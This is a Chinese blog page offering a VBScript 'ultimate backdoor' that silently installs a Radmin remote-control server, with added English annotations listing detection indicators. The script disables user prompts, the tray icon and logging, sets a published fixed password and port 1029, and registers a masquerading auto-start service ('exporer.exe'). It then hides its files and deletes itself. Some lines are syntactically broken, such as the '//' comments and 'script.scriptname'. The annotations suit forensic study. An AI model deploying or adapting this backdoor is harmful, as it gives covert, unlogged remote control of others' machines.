Vbs脚本实现radmin终极后门代码_删除自身
2022-08-27 16:49:09
' Purpose (as shown on this page): silently configures a Radmin v2.0 server through the
' WMI StdRegProv registry provider, registers it as an auto-start Windows service under
' a system-looking name, hides its files, and finally tries to delete the script itself.
' The notes below are reviewer annotations for detection and incident response.
'
' Host artifacts visible in this listing:
'   - registry tree  HKLM\system\radmin\v2.0\server\{iplist,parameters}
'   - service        winmanagehelp (start= auto), image %systemroot%\system32\exporer.exe
'   - files          exporer.exe, admdll.dll, raddrv.dll in system32, marked +r +h +s
'   - listener       port 1029, per the author's note on the "port" value
' The listing never copies those three files, so they must reach system32 by some other
' step; an investigation should also establish how they were delivered.

' Runtime errors are suppressed for the whole script, so every step below fails silently.
on error resume next
' Root-key constant for HKEY_LOCAL_MACHINE as expected by StdRegProv.
const hkey_local_machine = &h80000002
' "." targets the local machine.
strcomputer = "."
' stdout is assigned here but not used anywhere else in this listing.
set stdout = wscript.stdout
' Bind to the WMI registry provider. Writing to HKLM needs administrative rights, so the
' script is presumably run from an already-elevated context (confirm against the case).
set oreg=getobject("winmgmts:{impersonationlevel=impersonate}!\\" &_
strcomputer & "\root\default:stdregprov")
' Create the Radmin configuration tree one level at a time. Registry auditing or Sysmon
' registry events on HKLM\SYSTEM\RAdmin will record these key creations.
strkeypath = "system\radmin"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\radmin\v2.0"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\radmin\v2.0\server"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\radmin\v2.0\server\iplist"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\radmin\v2.0\server\parameters"
oreg.createkey hkey_local_machine,strkeypath
' Second binding to the same provider, used for the REG_BINARY writes below.
set objregistry = getobject("winmgmts:root\default:stdregprov")
strpath = "system\radmin\v2.0\server\parameters"
' Each value is a 4-byte array. Judging by the value names (semantics not shown on this
' page): no prompt to the console user, tray icon disabled, event-log and file logging
' off, no IP filter, NT authentication off. Taken together this is a configuration meant
' to leave the remote-control server unnoticed and unlogged.
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"askuser",ubinary)
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"autoallow",ubinary)
' disabletrayicon is the only flag set to 1.
ubinary = array(1,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"disabletrayicon",ubinary)
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"enableeventlog",ubinary)
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"enablelogfile",ubinary)
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"filterip",ubinary)
ubinary = array(0,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"ntauthenabled",ubinary)
' Author's trailing note: these 16 bytes are a registry export converted from hex to
' decimal and represent the Radmin password. It is a fixed, publicly posted credential:
' a host carrying this exact "parameter" value is reachable by anyone who has read the
' page. The byte sequence is usable as a registry hunting indicator.
ubinary = array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"parameter",ubinary) //radmin密码
' Author's trailing note: port 1029. The bytes 5,4,0,0 read little-endian give 0x0405 = 1029.
' An unexpected listener on that port is a network-side indicator.
ubinary = array(5,4,0,0) //端口:1029
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"port",ubinary)
ubinary = array(10,0,0,0)
return = objregistry.setbinaryvalue(hkey_local_machine,strpath,"timeout",ubinary)
' Re-bind the provider and stage the string value "logfilepath" (written a few lines
' below), even though enablelogfile was set to 0 above.
set oreg=getobject("winmgmts:{impersonationlevel=impersonate}!\\" &strcomputer &"\root\default:stdregprov")
strkeypath = "system\radmin\v2.0\server\parameters"
strvaluename = "logfilepath"
strvalue = "c:\logfile.txt"
set wshshell=createobject ("wscript.shell")
' Registers an auto-start service via sc.exe; the second argument 0 runs it with a hidden
' window. Service installation is recorded by the Service Control Manager (System log,
' event 7045; Security event 4697 when that audit policy is on). The image name
' "exporer.exe" is one letter away from explorer.exe, i.e. it masquerades as a system binary.
a=wshshell.run ("sc.exe create winmanagehelp binpath= %systemroot%\system32\exporer.exe start= auto",0)
oreg.setstringvalue hkey_local_machine,strkeypath,strvaluename,strvalue
set oreg=getobject("winmgmts:{impersonationlevel=impersonate}!\\" &strcomputer &"\root\default:stdregprov")
' The service metadata is edited directly in the registry under controlset001 rather than
' through the service APIs. The description and display name imitate a Windows component;
' compare them with the real image path when triaging services.
strkeypath = "system\controlset001\services\winmanagehelp"
strvaluename = "description"
strvalue = "windows media playerwindows management instrumentation player drivers."
oreg.setstringvalue hkey_local_machine,strkeypath,strvaluename,strvalue
strvaluename = "displayname"
strvalue = "windows management instrumentation player drivers"
oreg.setstringvalue hkey_local_machine,strkeypath,strvaluename,strvalue
' imagepath is overwritten with a hard-coded c:\windows path plus the /service argument.
strvaluename = "imagepath"
strvalue = "c:\windows\system32\exporer.exe /service"
oreg.setexpandedstringvalue hkey_local_machine,strkeypath,strvaluename,strvalue
set wshshell=createobject ("wscript.shell")
' Starts the service, then marks the three files read-only + hidden + system so they do
' not appear in a default Explorer or dir listing. admdll.dll and raddrv.dll are
' presumably the Radmin support libraries (not established by this page). A script host
' (wscript/cscript) spawning sc.exe, net.exe and attrib.exe in sequence is a useful
' process-creation detection.
a=wshshell.run ("net start winmanagehelp",0)
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0)
c=wshshell.run ("attrib +r +h +s %systemroot%\system32\admdll.dll",0)
d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0)
' Author's trailing note: self-deletion. This is an anti-forensics step; the dropper may
' or may not remain on disk, so base triage on the registry, service and file artifacts
' listed at the top rather than on finding the .vbs file.
createobject("scripting.filesystemobject").deletefile(wscript.scriptname) //自删除
最好的删除代码不错
' Self-deletion one-liner repeated by the page from the end of the listing above.
' A script that removes itself after running is an anti-forensics indicator; recovery of
' what ran then depends on process-creation, script-host and registry telemetry rather
' than on the file still being present.
createobject("scripting.filesystemobject").deletefile(script.scriptname)